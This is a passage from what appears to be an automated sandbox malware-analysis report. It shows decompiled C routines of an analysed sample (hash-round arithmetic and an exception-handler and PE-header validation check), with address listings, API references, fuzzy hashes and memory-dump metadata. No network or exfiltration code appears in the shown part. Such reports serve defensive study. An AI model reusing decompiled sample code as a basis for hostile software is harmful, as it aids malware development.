                                                                                                                                                                                                                                    				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
                                                                                                                                                                                                                                    				asm("rol edx, 0xa");
                                                                                                                                                                                                                                    				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
                                                                                                                                                                                                                                    				_t399 = _a4;
                                                                                                                                                                                                                                    				asm("rol esi, 0xf");
                                                                                                                                                                                                                                    				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
                                                                                                                                                                                                                                    				 *_t399 =  *_t399 + _t259;
                                                                                                                                                                                                                                    				asm("ror eax, 0xb");
                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
                                                                                                                                                                                                                                    				return memset( &_v76, 0, 0x40);
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x02f998db
                                                                                                                                                                                                                                    0x02f998f5
                                                                                                                                                                                                                                    0x02f998f8
                                                                                                                                                                                                                                    0x02f9990e
                                                                                                                                                                                                                                    0x02f99911
                                                                                                                                                                                                                                    0x02f99913
                                                                                                                                                                                                                                    0x02f9992b
                                                                                                                                                                                                                                    0x02f99930
                                                                                                                                                                                                                                    0x02f99933
                                                                                                                                                                                                                                    0x02f99949
                                                                                                                                                                                                                                    0x02f9994c
                                                                                                                                                                                                                                    0x02f99966
                                                                                                                                                                                                                                    0x02f99969
                                                                                                                                                                                                                                    0x02f9997f
                                                                                                                                                                                                                                    0x02f99982
                                                                                                                                                                                                                                    0x02f99984
                                                                                                                                                                                                                                    0x02f9999f
                                                                                                                                                                                                                                    0x02f999a2
                                                                                                                                                                                                                                    0x02f999b9
                                                                                                                                                                                                                                    0x02f999bc
                                                                                                                                                                                                                                    0x02f999c0
                                                                                                                                                                                                                                    0x02f999d9
                                                                                                                                                                                                                                    0x02f999dc
                                                                                                                                                                                                                                    0x02f999de
                                                                                                                                                                                                                                    0x02f999e1
                                                                                                                                                                                                                                    0x02f999fc
                                                                                                                                                                                                                                    0x02f999ff
                                                                                                                                                                                                                                    0x02f99a18
                                                                                                                                                                                                                                    0x02f99a1b
                                                                                                                                                                                                                                    0x02f99a2b
                                                                                                                                                                                                                                    0x02f99a2e
                                                                                                                                                                                                                                    0x02f99a46
                                                                                                                                                                                                                                    0x02f99a49
                                                                                                                                                                                                                                    0x02f99a63
                                                                                                                                                                                                                                    0x02f99a66
                                                                                                                                                                                                                                    0x02f99a7e
                                                                                                                                                                                                                                    0x02f99a81
                                                                                                                                                                                                                                    0x02f99a97
                                                                                                                                                                                                                                    0x02f99a9a
                                                                                                                                                                                                                                    0x02f99ab2
                                                                                                                                                                                                                                    0x02f99ab5
                                                                                                                                                                                                                                    0x02f99acd
                                                                                                                                                                                                                                    0x02f99ad0
                                                                                                                                                                                                                                    0x02f99aea
                                                                                                                                                                                                                                    0x02f99aed
                                                                                                                                                                                                                                    0x02f99b03
                                                                                                                                                                                                                                    0x02f99b06
                                                                                                                                                                                                                                    0x02f99b1e
                                                                                                                                                                                                                                    0x02f99b21
                                                                                                                                                                                                                                    0x02f99b3b
                                                                                                                                                                                                                                    0x02f99b3e
                                                                                                                                                                                                                                    0x02f99b56
                                                                                                                                                                                                                                    0x02f99b59
                                                                                                                                                                                                                                    0x02f99b6f
                                                                                                                                                                                                                                    0x02f99b72
                                                                                                                                                                                                                                    0x02f99b8a
                                                                                                                                                                                                                                    0x02f99b8d
                                                                                                                                                                                                                                    0x02f99ba5
                                                                                                                                                                                                                                    0x02f99ba8
                                                                                                                                                                                                                                    0x02f99bba
                                                                                                                                                                                                                                    0x02f99bbd
                                                                                                                                                                                                                                    0x02f99bcf
                                                                                                                                                                                                                                    0x02f99bd2
                                                                                                                                                                                                                                    0x02f99be4
                                                                                                                                                                                                                                    0x02f99be7
                                                                                                                                                                                                                                    0x02f99beb
                                                                                                                                                                                                                                    0x02f99bfb
                                                                                                                                                                                                                                    0x02f99bfe
                                                                                                                                                                                                                                    0x02f99c0c
                                                                                                                                                                                                                                    0x02f99c0f
                                                                                                                                                                                                                                    0x02f99c21
                                                                                                                                                                                                                                    0x02f99c24
                                                                                                                                                                                                                                    0x02f99c38
                                                                                                                                                                                                                                    0x02f99c3b
                                                                                                                                                                                                                                    0x02f99c3d
                                                                                                                                                                                                                                    0x02f99c4d
                                                                                                                                                                                                                                    0x02f99c50
                                                                                                                                                                                                                                    0x02f99c62
                                                                                                                                                                                                                                    0x02f99c65
                                                                                                                                                                                                                                    0x02f99c73
                                                                                                                                                                                                                                    0x02f99c76
                                                                                                                                                                                                                                    0x02f99c88
                                                                                                                                                                                                                                    0x02f99c8b
                                                                                                                                                                                                                                    0x02f99c8f
                                                                                                                                                                                                                                    0x02f99c9f
                                                                                                                                                                                                                                    0x02f99ca2
                                                                                                                                                                                                                                    0x02f99cb4
                                                                                                                                                                                                                                    0x02f99cb7
                                                                                                                                                                                                                                    0x02f99cc5
                                                                                                                                                                                                                                    0x02f99cc8
                                                                                                                                                                                                                                    0x02f99cda
                                                                                                                                                                                                                                    0x02f99cdd
                                                                                                                                                                                                                                    0x02f99cef
                                                                                                                                                                                                                                    0x02f99cf2
                                                                                                                                                                                                                                    0x02f99d06
                                                                                                                                                                                                                                    0x02f99d09
                                                                                                                                                                                                                                    0x02f99d1d
                                                                                                                                                                                                                                    0x02f99d20
                                                                                                                                                                                                                                    0x02f99d34
                                                                                                                                                                                                                                    0x02f99d37
                                                                                                                                                                                                                                    0x02f99d4b
                                                                                                                                                                                                                                    0x02f99d4e
                                                                                                                                                                                                                                    0x02f99d62
                                                                                                                                                                                                                                    0x02f99d65
                                                                                                                                                                                                                                    0x02f99d79
                                                                                                                                                                                                                                    0x02f99d7e
                                                                                                                                                                                                                                    0x02f99d90
                                                                                                                                                                                                                                    0x02f99d93
                                                                                                                                                                                                                                    0x02f99da7
                                                                                                                                                                                                                                    0x02f99daa
                                                                                                                                                                                                                                    0x02f99dbe
                                                                                                                                                                                                                                    0x02f99dc1
                                                                                                                                                                                                                                    0x02f99dd7
                                                                                                                                                                                                                                    0x02f99dda
                                                                                                                                                                                                                                    0x02f99dee
                                                                                                                                                                                                                                    0x02f99df1

APIs
Memory Dump Source
• Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
• Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
• Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0
• Opcode ID: 52e03f73daf1acbc6a4f2a9c02c66ec997d616785c4cba18c714e75c778021e1
• Instruction ID: 5794df8f93a54c3b967d44dfae819198ea268a45a4c1082618a5be0077ddf6cd
• Opcode Fuzzy Hash: 52e03f73daf1acbc6a4f2a9c02c66ec997d616785c4cba18c714e75c778021e1
• Instruction Fuzzy Hash: 2722847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00402375(long _a4) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                    				short* _v32;
                                                                                                                                                                                                                                    				void _v36;
                                                                                                                                                                                                                                    				void* _t57;
                                                                                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                    				signed int _t62;
                                                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                                                    				signed int* _t68;
                                                                                                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                    				void _t80;
                                                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                                                                    				short* _t87;
                                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                                    				signed int* _t90;
                                                                                                                                                                                                                                    				long _t91;
                                                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                                                                    				signed int _t100;
                                                                                                                                                                                                                                    				signed int _t102;
                                                                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                                                                    				long _t108;
                                                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t108 = _a4;
                                                                                                                                                                                                                                    				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                                    				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                                    				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                                    				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                                    					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                                    					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                                    					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                                    						_t91 = 0;
                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                    						_a4 = 0;
                                                                                                                                                                                                                                    						_t57 = _t76;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t80 =  *_t57;
                                                                                                                                                                                                                                    							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                    							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = _t80 - _t91;
                                                                                                                                                                                                                                    							if(_t80 >= _t91) {
                                                                                                                                                                                                                                    								L20:
                                                                                                                                                                                                                                    								_t63 = 0;
                                                                                                                                                                                                                                    								L60:
                                                                                                                                                                                                                                    								return _t63;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                    							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                                    							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                                    								_t12 =  &_a4;
                                                                                                                                                                                                                                    								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                                    								__eflags =  *_t12;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                                                                                                    							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                                    							__eflags = _t91 - _t102;
                                                                                                                                                                                                                                    						} while (_t91 <= _t102);
                                                                                                                                                                                                                                    						__eflags = _a4;
                                                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                                                    							_t81 =  *0x404178;
                                                                                                                                                                                                                                    							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                                    							_t58 = 0;
                                                                                                                                                                                                                                    							__eflags = _t81;
                                                                                                                                                                                                                                    							if(_t81 <= 0) {
                                                                                                                                                                                                                                    								L18:
                                                                                                                                                                                                                                    								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                                    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                                    								__eflags = _t61;
                                                                                                                                                                                                                                    								if(_t61 < 0) {
                                                                                                                                                                                                                                    									_t62 = 0;
                                                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                                                    								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x4041c0 = 1;
										__eflags =  *0x4041c0;
										if( *0x4041c0 != 0) {
											goto L60;
										}
										_t84 =  *0x404178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x4041c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x404178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x404180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x40417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x4041c0 = 1;
							__eflags =  *0x4041c0;
							if( *0x4041c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x4041c0 = 0;
									goto L5;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                    									L33:
                                                                                                                                                                                                                                    									_t90 = 0x404180 + _t100 * 4;
                                                                                                                                                                                                                                    									_t100 = _t100 + 1;
                                                                                                                                                                                                                                    									__eflags = _t100 - _t58;
                                                                                                                                                                                                                                    									 *_t90 = _t110;
                                                                                                                                                                                                                                    									_t110 =  *_t90;
                                                                                                                                                                                                                                    								} while (_t100 <= _t58);
                                                                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t58 = _t81 - 1;
                                                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                                                    							if(_t58 < 0) {
                                                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                                                    								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                                    								if(_t81 < 0x10) {
                                                                                                                                                                                                                                    									_t81 = _t81 + 1;
                                                                                                                                                                                                                                    									__eflags = _t81;
                                                                                                                                                                                                                                    									 *0x404178 = _t81;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t58 = _t81 - 1;
                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                    								L25:
                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                    								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t58 = _t58 - 1;
                                                                                                                                                                                                                                    								__eflags = _t58;
                                                                                                                                                                                                                                    								if(_t58 >= 0) {
                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                                                    							if(__eflags >= 0) {
                                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                                    									goto L34;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L28;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                                    						__eflags = _t75 - _v8;
                                                                                                                                                                                                                                    						if(_t75 < _v8) {
                                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = _t75 - _t108;
                                                                                                                                                                                                                                    						if(_t75 >= _t108) {
                                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                    					_t63 = 1;
                                                                                                                                                                                                                                    					goto L60;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    0x004024b5
                                                                                                                                                                                                                                    0x004024bc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004024c2
                                                                                                                                                                                                                                    0x004024c6
                                                                                                                                                                                                                                    0x00402522
                                                                                                                                                                                                                                    0x00402524
                                                                                                                                                                                                                                    0x0040252c
                                                                                                                                                                                                                                    0x0040252e
                                                                                                                                                                                                                                    0x00402530
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402532
                                                                                                                                                                                                                                    0x00402538
                                                                                                                                                                                                                                    0x0040253a
                                                                                                                                                                                                                                    0x0040253c
                                                                                                                                                                                                                                    0x00402551
                                                                                                                                                                                                                                    0x00402551
                                                                                                                                                                                                                                    0x00402553
                                                                                                                                                                                                                                    0x00402582
                                                                                                                                                                                                                                    0x00402589
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402589
                                                                                                                                                                                                                                    0x00402557
                                                                                                                                                                                                                                    0x00402558
                                                                                                                                                                                                                                    0x0040255a
                                                                                                                                                                                                                                    0x0040255c
                                                                                                                                                                                                                                    0x0040255c
                                                                                                                                                                                                                                    0x0040255e
                                                                                                                                                                                                                                    0x00402560
                                                                                                                                                                                                                                    0x00402562
                                                                                                                                                                                                                                    0x00402576
                                                                                                                                                                                                                                    0x00402576
                                                                                                                                                                                                                                    0x00402579
                                                                                                                                                                                                                                    0x0040257b
                                                                                                                                                                                                                                    0x0040257b
                                                                                                                                                                                                                                    0x0040257c
                                                                                                                                                                                                                                    0x0040257c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402564
                                                                                                                                                                                                                                    0x00402564
                                                                                                                                                                                                                                    0x00402564
                                                                                                                                                                                                                                    0x0040256d
                                                                                                                                                                                                                                    0x0040256e
                                                                                                                                                                                                                                    0x00402570
                                                                                                                                                                                                                                    0x00402572
                                                                                                                                                                                                                                    0x00402572
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402564
                                                                                                                                                                                                                                    0x00402562
                                                                                                                                                                                                                                    0x0040253e
                                                                                                                                                                                                                                    0x00402545
                                                                                                                                                                                                                                    0x00402545
                                                                                                                                                                                                                                    0x00402547
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402549
                                                                                                                                                                                                                                    0x0040254a
                                                                                                                                                                                                                                    0x0040254d
                                                                                                                                                                                                                                    0x0040254f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040254f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402545
                                                                                                                                                                                                                                    0x004024c8
                                                                                                                                                                                                                                    0x004024cb
                                                                                                                                                                                                                                    0x004024d0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004024d9
                                                                                                                                                                                                                                    0x004024db
                                                                                                                                                                                                                                    0x004024e1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004024e7
                                                                                                                                                                                                                                    0x004024ed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004024f3
                                                                                                                                                                                                                                    0x004024f5
                                                                                                                                                                                                                                    0x004024fe
                                                                                                                                                                                                                                    0x00402502
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402508
                                                                                                                                                                                                                                    0x0040250b
                                                                                                                                                                                                                                    0x0040250d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402514
                                                                                                                                                                                                                                    0x00402516
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402518
                                                                                                                                                                                                                                    0x0040251c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040251c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402407
                                                                                                                                                                                                                                    0x00402407
                                                                                                                                                                                                                                    0x00402407
                                                                                                                                                                                                                                    0x0040240e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402410
                                                                                                                                                                                                                                    0x00402411
                                                                                                                                                                                                                                    0x00402413
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00402426
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2850889275-0
                                                                                                                                                                                                                                    • Opcode ID: 626958346fd60cabf43f0ddbfab11c40b5535eb766f8715f11b79e1d1ab16b9d
                                                                                                                                                                                                                                    • Instruction ID: 8a986e9dcfd0441aff0562b3517ea09b8d901034ce7e192845dbb0a1bddafc0a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 626958346fd60cabf43f0ddbfab11c40b5535eb766f8715f11b79e1d1ab16b9d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE61D870600612ABDB19CF29DB9C66A73A5EB95314F24843BDD16F72D1E3BCDC82864C
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F9B341(long _a4) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                    				short* _v32;
                                                                                                                                                                                                                                    				void _v36;
                                                                                                                                                                                                                                    				void* _t57;
                                                                                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                    				signed int _t62;
                                                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                                                    				signed int* _t68;
                                                                                                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                    				void _t80;
                                                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                                                                    				short* _t87;
                                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                                    				signed int* _t90;
                                                                                                                                                                                                                                    				long _t91;
                                                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                                                                    				signed int _t100;
                                                                                                                                                                                                                                    				signed int _t102;
                                                                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                                                                    				long _t108;
                                                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t108 = _a4;
                                                                                                                                                                                                                                    				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                                    				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                                    				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                                    				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                                    					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                                    					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                                    					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                                    						_t91 = 0;
                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                    						_a4 = 0;
                                                                                                                                                                                                                                    						_t57 = _t76;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t80 =  *_t57;
                                                                                                                                                                                                                                    							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                    							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = _t80 - _t91;
                                                                                                                                                                                                                                    							if(_t80 >= _t91) {
                                                                                                                                                                                                                                    								L20:
                                                                                                                                                                                                                                    								_t63 = 0;
                                                                                                                                                                                                                                    								L60:
                                                                                                                                                                                                                                    								return _t63;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                    							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                                    							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                                    								_t12 =  &_a4;
                                                                                                                                                                                                                                    								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                                    								__eflags =  *_t12;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                                                                                                    							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                                    							__eflags = _t91 - _t102;
                                                                                                                                                                                                                                    						} while (_t91 <= _t102);
